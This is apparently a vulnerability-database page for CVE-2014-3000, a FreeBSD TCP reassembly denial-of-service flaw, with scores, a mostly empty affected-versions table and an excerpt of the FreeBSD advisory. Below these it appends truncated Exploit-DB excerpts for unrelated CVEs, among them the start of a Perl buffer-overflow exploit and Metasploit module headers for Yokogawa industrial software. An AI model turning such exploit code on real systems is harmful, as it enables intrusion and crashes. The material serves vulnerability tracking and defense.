CVE-2014-3000
Published 2014-05-02
Priority P342 · high · 7.8 (CVSS 2.0)
AV:N/AC:M/Au:N/C:P/I:N/A:C
EPSS
12.82%
95.8th percentile
The TCP reassembly function in the inet module in FreeBSD 8.3 before p16, 8.4 before p9, 9.1 before p12, 9.2 before p5, and 10.0 before p2 allows remote attackers to cause a denial of service (undefined memory access and system crash) or possibly read system memory via multiple crafted packets, related to moving a reassemble queue entry to the segment list when the queue is full.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
BSD
FreeBSD-SA-14:08.tcp: TCP reassembly vulnerability
bsd_advisories·2014-04-30·CVSS 7.8
CVE-2014-3000 [HIGH] FreeBSD-SA-14:08.tcp: TCP reassembly vulnerability
FreeBSD-SA-14:08.tcp Security Advisory
The FreeBSD Project
Topic: TCP reassembly vulnerability
Category: core
Module: inet
Announced: 2014-04-30
Credits: Jonathan Looney
Affects: All supported versions of FreeBSD.
Corrected: 2014-04-30 04:04:20 UTC (stable/8, 8.4-STABLE)
2014-04-30 04:05:47 UTC (releng/8.4, 8.4-RELEASE-p9)
2014-04-30 04:05:47 UTC (releng/8.3, 8.3-RELEASE-p16)
2014-04-30 04:04:20 UTC (stable/9, 9.2-STABLE)
2014-04-30 04:05:47 UTC (releng/9.2, 9.2-RELEASE-p5)
2014-04-30 04:05:47 UTC (releng/9.1, 9.1-RELEASE-p12)
2014-04-30 04:03:05 UTC (stable/10, 10.0-STABLE)
2014-04-30 04:04:42 UTC (releng/10.0, 10.0-RELEASE-p2)
CVE Name: CVE-2014-3000
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
fo
GHSA
GHSA-rvgw-rhj9-mj2c: The TCP reassembly function in the inet module in FreeBSD 8
ghsa_unreviewed·2022-05-17
CVE-2014-3000 [HIGH] CWE-119 GHSA-rvgw-rhj9-mj2c: The TCP reassembly function in the inet module in FreeBSD 8
Exploit-DB
Asx to Mp3 2.7.5 - Local Stack Overflow
exploitdb·2014-10-07
CVE-2009-1324 Asx to Mp3 2.7.5 - Local Stack Overflow
---
###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
# Thanks Mike. :)
##########################################################################################
#!/usr/bin/perl
my $junk = "\x41" x 35056;
my $eip = pack ('V', 0x73e848a7);
my $nop = "\x90" x 4;
my $shellcode = "\x90" x 25;
$shellcode = $shellcode
Exploit-DB
Light Audio Player 1.0.14 - Memory Corruption (PoC)
exploitdb·2014-03-24
CVE-2014-2671 Light Audio Player 1.0.14 - Memory Corruption (PoC)
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
import os
os.system("color 02")
print"###########################################################"
print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x
Exploit-DB
Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2014-03-12
CVE-2014-0784 Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
exists in the service BKBCopyD.exe when handling specially crafted packets. This module has
been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.
},
'Author' =>
[
'juan vazquez',
'Redsadic '
],
'References' =>
[
[ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
[ 'URL', 'https://community.rapid7.com/community/metas
Exploit-DB
Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2014-03-12
CVE-2014-0783 Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
exists in the service BKHOdeq.exe when handling specially crafted packets. This module has
been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows
2003 SP2.
},
'Author' =>
[
'juan vazquez',
'Redsadic '
],
'References' =>
[
[ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
[ 'URL', 'https://community.rapid7.c
http://secunia.com/advisories/58293
http://secunia.com/advisories/59034
http://www.debian.org/security/2014/dsa-2952
http://www.freebsd.org/security/advisories/FreeBSD-SA-14:08.tcp.asc
http://www.securityfocus.com/bid/67153
http://www.securitytracker.com/id/1030172